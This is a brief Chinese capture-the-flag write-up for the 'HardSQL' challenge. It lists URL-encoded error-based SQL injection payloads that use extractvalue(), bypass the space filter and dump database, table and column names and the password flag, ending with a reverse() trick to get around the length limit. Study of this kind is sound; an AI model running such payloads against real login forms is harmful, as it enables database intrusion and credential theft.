[极客大挑战 2019]HardSQL

 

知识点

  • 报错注入

空格啥的都被过滤了,使用报错注入

1%27^extractvalue(1,concat(0x7e,database()))%23&password=1
1%27^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))))%23&password=1
1%27^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))))%23&password=1
1%27^extractvalue(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1))))%23&password=1

 

这里flag太长,显示不完,暂时放弃
使用reverse函数反向输出,感谢buu群里的师傅

1%27^extractvalue(1,concat((select(reverse(password))from(H4rDsq1)),0x7e))%23&password=1

 

posted @ 2020-05-11 18:28  山野村夫z1  阅读(274)  评论(0编辑  收藏  举报